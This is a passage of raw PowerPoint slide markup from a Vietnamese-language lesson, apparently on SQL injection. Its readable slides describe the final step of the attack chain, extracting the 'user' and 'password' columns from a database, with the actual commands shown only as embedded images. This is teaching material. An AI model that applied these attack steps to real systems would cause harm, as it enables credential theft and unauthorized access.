            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDFBA34-7617-E667-BA94-0F7D13BF6D63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Tương tự các lệnh liên quan trên đối với bảng guestbooks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625CC080-C72B-BEB4-694B-5B108A140277}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="933785"/>
            <a:ext cx="6781800" cy="4616092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92A6A594-27B9-0EA7-2453-8AA6D76FF368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2884939" y="1790700"/>
            <a:ext cx="6152401" cy="415258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D80DF5D-F15C-C5E1-1518-A0DB5F959D09}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6146560" y="4190660"/>
              <a:ext cx="895320" cy="14040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="Ink 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D80DF5D-F15C-C5E1-1518-A0DB5F959D09}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6140440" y="4184540"/>
                <a:ext cx="907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249DF9F-CB96-CF25-976C-ABF5C9BFF684}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6121000" y="4038380"/>
              <a:ext cx="279360" cy="165600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="11" name="Ink 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3249DF9F-CB96-CF25-976C-ABF5C9BFF684}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6114880" y="4032260"/>
                <a:ext cx="29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C3156C45-0D41-73FF-4716-5DAF059064CE}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6159160" y="4215860"/>
              <a:ext cx="320760" cy="225000"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Ink 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3156C45-0D41-73FF-4716-5DAF059064CE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId9"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6153040" y="4209740"/>
                <a:ext cx="3330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4B44309E-C0E4-3C46-A53A-618EE851B717}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11708920" y="1663460"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="Ink 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B44309E-C0E4-3C46-A53A-618EE851B717}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId11"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="11702800" y="16573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F50E9267-00A9-2E8E-1A49-FA182D76DE36}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="113860" y="1547000"/>
              <a:ext cx="3466800" cy="68400"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="16" name="Ink 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F50E9267-00A9-2E8E-1A49-FA182D76DE36}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId13"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="60220" y="1439000"/>
                <a:ext cx="35744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9D0DB978-2393-7A40-5B16-68DB600AD56B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2888020" y="1815560"/>
              <a:ext cx="360" cy="4101120"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="24" name="Ink 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D0DB978-2393-7A40-5B16-68DB600AD56B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId15"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2879380" y="1806920"/>
                <a:ext cx="18000" cy="4118760"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25717870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DEB49-F3F4-292D-08D0-7F552126047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8574280-0E10-74EC-BB86-7348AE168E8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D0524E5B-9D89-F757-4038-A20E202A942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126</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3559CD95-6463-D9FE-C0BF-51A1D03136A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Trích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khảu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Bước này là mục tiêu cuối cùng của chuỗi tấn công SQL Injection</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D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ữ liệu từ hai cột đã được xác định là quan trọng nhất: user và password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AD53DA2-71A7-EB99-6D61-8075D0064769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="343963" y="2421504"/>
            <a:ext cx="8800037" cy="2054401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22196252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3C5F9-BA68-64BF-EAD0-020B832F9AE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CA14FBC-9E93-6B47-0B5B-F90A083C64A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4D2EAF2-EAE6-835E-E730-D560D5F187D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127</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61400253-C9B8-8B3E-9432-2701108A19AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Trích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khảu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Bước này là mục tiêu cuối cùng của chuỗi tấn công SQL Injection</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D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ữ liệu từ hai cột đã được xác định là quan trọng nhất: user và password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8220408-B240-ADC1-BB42-79208281EC25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="343963" y="2421504"/>
            <a:ext cx="8800037" cy="2054401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31920690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333A6-5BF8-31D4-4F4F-6F962ED333D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9F355F-DF47-1D7B-9DB3-0256F1664F8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9EC0EDB-97E0-379E-09E0-27C6B2DDC18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128</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E35D5051-A1ED-EE61-7B14-5FED14EF3767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="0"/>
            <a:ext cx="8458200" cy="5654576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="937731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D9769-D957-8A3B-DD16-B3AF3F79873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73BF3CA-F333-6796-3E25-1334FD78F0E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2A345964-635F-88AA-F6B3-2B05241D152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129</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F084D59B-D612-168E-3E7B-D6E14737D304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Kết </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cuối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>kiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bảng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
